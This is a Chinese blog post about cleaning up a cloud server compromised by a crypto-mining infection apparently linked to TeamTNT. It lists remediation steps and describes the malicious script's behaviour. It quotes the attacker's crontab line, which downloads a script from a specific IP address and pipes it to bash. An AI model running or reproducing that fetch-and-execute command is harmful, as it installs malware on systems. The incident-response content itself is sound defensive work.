- 1对 TIM_SetCompare1(TIM_TypeDef* TIMx, uint16_t Compare1)函数在PWM应用中的理解
- 2NVIDIA Tesla P100计算卡性能首测:震撼地球!_tesla p100参数
- 3Java:有了这些Java项目经历,面大厂稳了!_java项目经历分享
- 4【华为 ICT & HCIA & eNSP 习题汇总】——题目集2_华为ensp防火墙考试题
- 5LightGBM 中文文档_lightgbm文档
- 6微信小程序实现微信支付的相关操作设置_微信小程序支付配置
- 7android线性布局换行,Android可自动换行的布局 -- AutoWrapLineLayout
- 8FastAdmin西陆房产系统(xiluHouse)全开源-房产报备小程序APP
- 9鸿蒙Harmony应用开发—ArkTS声明式开发(容器组件:Scroll)_鸿蒙 edgeeffect
- 10Undefined class constant 'MYSQL_ATTR_INIT_COMMAND'
服务器被黑挖矿解决记录_104.192.82.138
赞
踩
好多天没有连接上阿里云服务器,然后看了一下,好家伙,cpu占用全是99%,发生了肾么事
然后远程连接都连接不上,就直接在服务器上停止了,然后把防火墙都关掉。重新连接。
然后开始处理,找了一些相关的博客看了一下。
首先.ssh中多了两个秘钥,rm掉,但表示没有权限。被人用chattr锁上了,进而编译下载chattr去除,然后删掉
chattr -ai 用户多了个lsb用户,同样方法删掉
用top和ps -ef 指令看了一下,发现没什么高占用程序,只有sendmail占用高,应该是我把端口都禁用掉的原因。
crontab -l 中有定时任务
*/30 * * * * /bin/cdz -fsSL http://104.192.82.138/s3f1015/a/a.sh | bash > /dev/null 2>&1
删除crontab定时任务,其中用-e没有权限,etc 和另一个文件夹都被修改了chattr
- crontab -l #查看
- crontabl -e #编辑删除
其中因为权限问题,还需要修改另一个文件夹,忘了
想想自己不用sendmail,直接删掉
- whereis sendmail
- rm -rf /usr/bin/sendmail
- kill -9 [pid]
last中没有看到异常的用户,应该是把记录都清除掉了
删除对应的一些挖矿进程,或直接重启,查看启动项等
然后我以为就结束了,好奇看下那个网址下的脚本是啥,行吧
ps、top、pstree命令都被修改过了,过滤掉了挖矿程序
把这些命令反操作复原一下
脚本中主要是做了,准备wget、chattr程序,改造ps、top、pstree隐藏挖矿程序,制作.ssh秘钥留后门,删除其他的挖矿程序(高于65%cpu占用),清除痕迹,还有一段用bash64编码的程序,然后运行挖矿程序
最终挖矿程序也是网址上的httpd脚本
其中的注释中提到teamTNT。
因为之前直接将阿里云防火墙全部端口打开了,所以没法推测是redis漏洞还是docker漏洞侵入的,建议最好只打开需要用到的端口
在docker中,多了个docker镜像,在公共仓库上有10k下载了,猜测这个就是侵入镜像,那么还是有挺多人中招的
这么一套下来,虽然费了些时间,而且确实不明确还有没有彻底清理掉。但是其中也对linux更熟悉了一些,还挺有意思的
目前对于攻击流程还不明确,也稍微有点遗憾
但下次遇到病毒,总结下来处理流程是
1. 清除.ssh里的后门
2. 清除定时任务
3. 杀死可疑的进程和删掉可疑的程序
4. 查看重要的命令是有有被修改,有的话进行修复
5. 查找被攻击的缘由
当然,如果服务器没有重要的数据,直接重装最快乐。
参考链接:
记一次阿里云服务器因Redis被【挖矿病毒crypto和pnscan】攻击的case,附带解决方案_董哥的黑板报-CSDN博客
